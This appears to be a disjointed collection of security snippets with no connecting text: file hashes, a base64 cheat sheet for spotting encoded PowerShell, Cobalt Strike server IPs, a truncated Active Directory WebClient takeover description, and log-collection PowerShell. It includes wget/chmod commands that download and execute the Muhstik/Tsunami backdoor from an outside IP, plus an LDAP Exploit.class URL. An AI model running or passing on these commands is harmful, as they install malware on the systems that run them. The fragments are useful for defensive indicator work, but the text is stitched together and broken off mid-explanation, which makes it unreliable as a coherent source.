- RunDll32.exe shell32.dll,Control_RunDLL appwiz.cpl,,0
- RunDll32.exe msrating.dll,RatingSetupUI
09a46b3e1be080745a6d8d88d6b5bd351b1c7586ae0dc94d0c238ee36421cafa | |
149601e15002f78866ab73033eb8577f11bd489a4cea87b10c52a70fdf78d9ff | |
190d9c3e071a38cb26211bfffeb6c4bb88bd74c6bf99db9bb1f084c6a7e1df4e | |
24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c | |
2584e1521065e45ec3c17767c065429038fc6291c091097ea8b22c8a502c41dd | |
4186675cb6706f9d51167fb0f14cd3f8fcfb0065093f62b10a15f7d9a6c8d982 | |
593bbcc8f34047da9960b8456094c0eaf69caaf16f1626b813484207df8bd8af | |
5ad4efd90dcde01d26cc6f32f7ce3ce0b4d4951d4b94a19aa097341aff2acaec | |
7c465ea7bcccf4f94147add808f24629644be11c0ba4823f16e8c19e0090f0ff | |
9b60c622546dc45cca64df935b71c26dcf4886d6fa811944dbc4e23db9335640 |
Base64 Code | Mnemonic Aid | Decoded* | Description |
---|---|---|---|
JAB |
🗣 Jabber | $. |
Variable declaration (UTF-16), e.g. JABlAG4AdgA for $env: |
TVq |
📺 Television | MZ |
MZ header |
SUVY |
🚙 SUV | IEX |
PowerShell Invoke Expression |
SQBFAF |
🐣 Squab favorite | I.E. |
PowerShell Invoke Expression (UTF-16) |
SQBuAH |
🐣 Squab uahhh | I.n. |
PowerShell Invoke string (UTF-16) e.g. Invoke-Mimikatz |
PAA |
💪 "Pah!" | <. |
Often used by Emotet (UTF-16) |
Cobalt Strike Servers: | |
192.151.234.160 | |
192.151.234.161 | |
192.151.234.162 | |
192.151.234.163 | |
192.151.234.164 | |
192.151.234.165 | |
192.151.234.166 | |
192.151.234.167 |
In the default configuration of Active Directory, it is possible to remotely take over Workstations (Windows 7/10/11) and possibly servers (if Desktop Experience is installed) when their WebClient service is running. This is accomplished in short by;
The caveat to this is that the WebClient service does not automatically start at boot. However, if the WebClient service has been triggered to start on a workstation (for example, via some SharePoint interactions), you can remotely take over that system. In addition, there are several ways to coerce the WebClient service to start remotely which I cover in a section below.
45.130.229.168:1389/Exploit.class | |
Exploit.class 4d040caffa28e6a0fdc0d274547cf1c7983996fc33e51b0b2c511544f030d71b | |
--> curl http://18.228.7.109/.log/log | |
log d59dba711478b6c6fdba87a9cfc9af753783c4d9120111a9ef026c9362a8e74b | |
--> Download of Muhstik/Tsunami Backdoor | |
wget -O /tmp/pty3 http://18.228.7.109/.log/pty3; chmod +x /tmp/pty3; chmod 700 /tmp/pty3; /tmp/pty3 & | |
wget -O /tmp/pty4 http://18.228.7.109/.log/pty4; chmod +x /tmp/pty4; chmod 700 /tmp/pty4; /tmp/pty4 & | |
wget -O /tmp/pty2 http://18.228.7.109/.log/pty2; chmod +x /tmp/pty2; chmod 700 /tmp/pty2; /tmp/pty2 & |
#Ensure errors don't ruin anything for us | |
$ErrorActionPreference = "SilentlyContinue" | |
# Set variables | |
$DesktopPath = [Environment]::GetFolderPath("Desktop") | |
$basic = "C:\windows\System32\winevt\Logs\Application.evtx", "C:\windows\System32\winevt\Logs\Microsoft-Windows-PowerShell%4Operational.evtx", "C:\windows\System32\winevt\Logs\System.evtx", "C:\windows\System32\winevt\Logs\Microsoft-Windows-Windows Defender%4Operational.evtx", "C:\windows\System32\winevt\Logs\Security.evtx", "C:\windows\System32\winevt\Logs\Microsoft-Windows-Sysmon%4Operational.evtx" | |
$remote_logs = "C:\windows\System32\winevt\Logs\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx", "C:\windows\System32\winevt\Logs\Microsoft-Windows-WinRM%4Operational.evtx" |